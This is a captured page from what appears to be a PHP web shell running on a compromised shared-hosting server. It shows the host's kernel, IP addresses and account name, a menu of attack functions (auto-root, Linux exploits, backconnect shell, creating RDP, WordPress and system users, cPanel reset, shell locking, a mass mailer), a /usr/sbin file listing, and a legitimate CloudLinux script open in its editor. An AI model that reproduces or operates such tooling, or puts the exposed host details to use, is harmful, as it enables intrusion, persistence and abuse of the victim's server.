Linux musi.iixcp.rumahweb.net 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
LiteSpeed
: 103.247.9.165 | : 216.73.216.132
Cant Read [ /etc/named.conf ]
7.4.33
pliq4844
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
sbin /
[ HOME SHELL ]
Name
Size
Permission
Action
cagefs_enter_site
1.83
KB
-rwxr-xr-x
chroot
39.73
KB
-rwxr-xr-x
cloudlinux-selector
654
B
-rwxr-xr-x
consoletype
15.13
KB
-rwxr-xr-x
cracklib-check
15.7
KB
-rwxr-xr-x
cracklib-format
255
B
-rwxr-xr-x
cracklib-packer
15.7
KB
-rwxr-xr-x
cracklib-unpacker
15.69
KB
-rwxr-xr-x
create-cracklib-dict
994
B
-rwxr-xr-x
ddns-confgen
27.26
KB
-rwxr-xr-x
exim
1.25
KB
-rwxr-xr-x
faillock
23.18
KB
-rwxr-xr-x
ip
770.19
KB
-rwxr-xr-x
ldconfig
1.12
MB
-rwxr-xr-x
mkhomedir_helper
23.21
KB
-rwxr-xr-x
named-checkzone
39.34
KB
-rwxr-xr-x
named-compilezone
39.34
KB
-rwxr-xr-x
named-nzd2nzf
15.12
KB
-rwxr-xr-x
nsec3hash
15.2
KB
-rwxr-xr-x
pam_console_apply
43.51
KB
-rwxr-xr-x
pam_namespace_helper
471
B
-rwxr-xr-x
pam_timestamp_check
15.13
KB
-rwxr-xr-x
pluginviewer
19.39
KB
-rwxr-xr-x
proxyexec
24.01
KB
-r-xr-xr-x
pwhistory_helper
19.2
KB
-rwxr-xr-x
saslauthd
88.33
KB
-rwxr-xr-x
sasldblistusers2
15.27
KB
-rwxr-xr-x
saslpasswd2
15.24
KB
-rwxr-xr-x
sendmail
1.26
KB
-rwxr-xr-x
snmpd
35.22
KB
-rwxr-xr-x
snmptrapd
35.34
KB
-rwxr-xr-x
testsaslauthd
15.16
KB
-rwxr-xr-x
tmpwatch
36.03
KB
-rwxr-xr-x
tsig-keygen
27.26
KB
-rwxr-xr-x
unix_chkpwd
23.28
KB
-rwxr-xr-x
unix_update
31.32
KB
-rwx------
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cagefs_enter_site
#!/opt/cloudlinux/venv/bin/python3 -sbb # -*- coding: utf-8 -*- # # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2025 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # https://cloudlinux.com/docs/LICENCE.TXT # """ Execute a command inside CageFS for a site (document root or domain). This wrapper provides a command-line interface for executing commands within the isolated CageFS environment for a specific website. """ import argparse import os import sys from clcagefslib.webisolation import libenter def create_parser(): """ Create argument parser for cagefs_enter_site. Returns: argparse.ArgumentParser: Configured argument parser """ parser = argparse.ArgumentParser( # the command is named with _underscores_ to match # existing cagefs_enter wrapper from lvewrappers prog="cagefs_enter_site", description="Execute a command inside CageFS for a site (document root or domain)", ) parser.add_argument("site", type=str, help="Document root or domain") parser.add_argument( "command", type=str, nargs=argparse.REMAINDER, help="Command to execute" ) return parser def main(): """ Main entry point. Returns: int: Exit code """ parser = create_parser() args = parser.parse_args() if not args.command: parser.error("COMMAND is required") try: return libenter.enter_site(args.site, args.command) except ValueError as e: print(f"Error: {e}", file=sys.stderr) return 1 except KeyboardInterrupt: # Clean Ctrl+C exit without traceback (exit code 130 = SIGINT). return 130 if __name__ == "__main__": if os.geteuid() == 0: print("Error: This program can not be run as root", file=sys.stderr) sys.exit(1) sys.exit(main())
Close